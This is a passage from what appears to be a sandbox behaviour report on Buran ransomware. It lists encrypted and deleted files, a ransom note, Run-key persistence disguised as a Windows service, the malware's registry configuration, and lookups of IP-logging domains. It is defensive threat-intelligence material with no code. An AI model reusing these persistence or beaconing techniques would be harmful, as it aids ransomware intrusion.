- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
- "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
- "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
- "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe",
- "C:\\.doc",
- "C:\\.htm",
- "C:\\.jpeg",
- "C:\\.jpg",
- "C:\\.pptx",
- "C:\\.txt",
- "C:\\.xls",
- "C:\\Host.bmp",
- "C:\\Host.docx",
- "C:\\Host.html",
- "C:\\Host.jpeg",
- "C:\\Host.jpg",
- "C:\\Host.pdf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
- "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Public Key",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Machine ID",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Knock",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths",
- "HKEY_CURRENT_USER\\Software\\Buran V\\Service\\Paths\\0",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Registry Writer",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\COM+ REGDB Writer",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\ASR Writer",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\VSS\\Diag\\Shadow Copy Optimization Writer",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\(Default)"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "geoiptool.com",
- "answers":
- "type": "A",
- "request": "iplogger.ru",
- "answers":
- * Domains:
- "ip": "158.69.67.193",
- "domain": "geoiptool.com"
- "ip": "88.99.66.31",
- "domain": "iplogger.ru"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: